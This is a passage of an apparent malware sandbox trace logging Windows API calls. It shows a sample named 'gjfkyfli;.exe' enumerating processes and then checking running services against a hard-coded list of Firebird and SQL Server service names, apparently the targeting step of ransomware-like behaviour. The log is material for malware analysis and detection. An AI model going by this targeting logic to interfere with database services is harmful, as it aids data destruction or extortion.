	[0169.507] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0169.507] lstrlenW (lpString="winlogon.exe") returned 12
	[0169.507] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0169.507] lstrlenW (lpString="services.exe") returned 12
	[0169.507] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0169.508] lstrlenW (lpString="lsass.exe") returned 9
	[0169.508] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0169.508] lstrlenW (lpString="lsm.exe") returned 7
	[0169.508] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.508] lstrlenW (lpString="svchost.exe") returned 11
	[0169.508] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.509] lstrlenW (lpString="svchost.exe") returned 11
	[0169.509] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.522] lstrlenW (lpString="svchost.exe") returned 11
	[0169.522] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.523] lstrlenW (lpString="svchost.exe") returned 11
	[0169.523] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.523] lstrlenW (lpString="svchost.exe") returned 11
	[0169.523] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0169.544] lstrlenW (lpString="audiodg.exe") returned 11
	[0169.544] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.544] lstrlenW (lpString="svchost.exe") returned 11
	[0169.544] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.555] lstrlenW (lpString="svchost.exe") returned 11
	[0169.555] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0169.555] lstrlenW (lpString="spoolsv.exe") returned 11
	[0169.555] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0169.556] lstrlenW (lpString="svchost.exe") returned 11
	[0169.564] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0169.564] lstrlenW (lpString="taskhost.exe") returned 12
	[0169.564] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0169.565] lstrlenW (lpString="dwm.exe") returned 7
	[0169.565] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0169.565] lstrlenW (lpString="explorer.exe") returned 12
	[0169.565] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0169.565] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0169.565] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0169.566] lstrlenW (lpString="reader_sl.exe") returned 13
	[0169.566] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0169.566] lstrlenW (lpString="taskhost.exe") returned 12
	[0169.566] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0169.566] lstrlenW (lpString="dllhost.exe") returned 11
	[0169.566] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0169.567] lstrlenW (lpString="dllhost.exe") returned 11
	[0169.567] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0169.567] lstrlenW (lpString="rundll32.exe") returned 12
	[0169.567] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1
	[0169.567] lstrlenW (lpString="dinotify.exe") returned 12
	[0169.567] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0169.568] lstrlenW (lpString="dllhost.exe") returned 11
	[0169.568] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0169.568] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0169.568] Process32NextW (in: hSnapshot=0x124, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 0
	[0169.568] CloseHandle (hObject=0x124) returned 1
	[0169.568] Sleep (dwMilliseconds=0x1f4) 
	[0170.090] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb51c710
	[0170.090] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0170.090] GetLastError () returned 0xea
	[0170.091] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0xb617698
	[0170.091] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb617698, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb617698, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0170.091] CloseServiceHandle (hSCObject=0xb51c710) returned 1
	[0170.091] lstrlenW (lpString="Appinfo") returned 7
	[0170.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0170.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0170.091] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0170.091] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0170.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0170.091] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0170.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0170.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0170.091] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0170.092] lstrlenW (lpString="AudioSrv") returned 8
	[0170.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0170.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0170.092] lstrlenW (lpString="BFE") returned 3
	[0170.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0170.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0170.092] lstrlenW (lpString="CryptSvc") returned 8
	[0170.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0170.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0170.092] lstrlenW (lpString="CscService") returned 10
	[0170.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0170.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0170.092] lstrlenW (lpString="DcomLaunch") returned 10
	[0170.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0170.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0170.092] lstrlenW (lpString="Dhcp") returned 4
	[0170.092] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0170.092] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0170.092] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0170.092] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0170.093] lstrlenW (lpString="Dnscache") returned 8
	[0170.093] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0170.093] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0170.093] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0170.093] lstrlenW (lpString="DPS") returned 3
	[0170.093] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0170.093] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0170.093] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0170.093] lstrlenW (lpString="eventlog") returned 8
	[0170.093] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0170.093] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0170.093] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0170.093] lstrlenW (lpString="EventSystem") returned 11
	[0170.093] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0170.093] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0170.093] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0170.093] lstrlenW (lpString="gpsvc") returned 5
	[0170.093] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0170.093] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0170.093] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0170.093] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0170.093] lstrlenW (lpString="iphlpsvc") returned 8
	[0170.093] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0170.093] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0170.093] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0170.093] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0170.093] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0170.093] lstrlenW (lpString="LanmanServer") returned 12
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0170.094] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0170.094] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0170.094] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0170.094] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0170.094] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0170.094] lstrlenW (lpString="lmhosts") returned 7
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0170.094] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0170.094] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0170.094] lstrlenW (lpString="MMCSS") returned 5
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0170.094] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0170.094] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0170.094] lstrlenW (lpString="MpsSvc") returned 6
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0170.094] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0170.094] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0170.094] lstrlenW (lpString="Netman") returned 6
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0170.094] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0170.094] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0170.094] lstrlenW (lpString="netprofm") returned 8
	[0170.094] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0170.094] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0170.095] lstrlenW (lpString="NlaSvc") returned 6
	[0170.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0170.095] lstrlenW (lpString="nsi") returned 3
	[0170.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0170.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0170.095] lstrlenW (lpString="PcaSvc") returned 6
	[0170.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0170.095] lstrlenW (lpString="PlugPlay") returned 8
	[0170.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0170.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0170.095] lstrlenW (lpString="Power") returned 5
	[0170.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0170.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0170.095] lstrlenW (lpString="ProfSvc") returned 7
	[0170.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0170.095] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0170.095] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0170.096] lstrlenW (lpString="RpcEptMapper") returned 12
	[0170.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0170.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0170.096] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0170.096] lstrlenW (lpString="RpcSs") returned 5
	[0170.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0170.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0170.096] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0170.096] lstrlenW (lpString="SamSs") returned 5
	[0170.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0170.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0170.096] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0170.096] lstrlenW (lpString="Schedule") returned 8
	[0170.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0170.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0170.096] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0170.096] lstrlenW (lpString="SENS") returned 4
	[0170.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0170.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0170.096] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
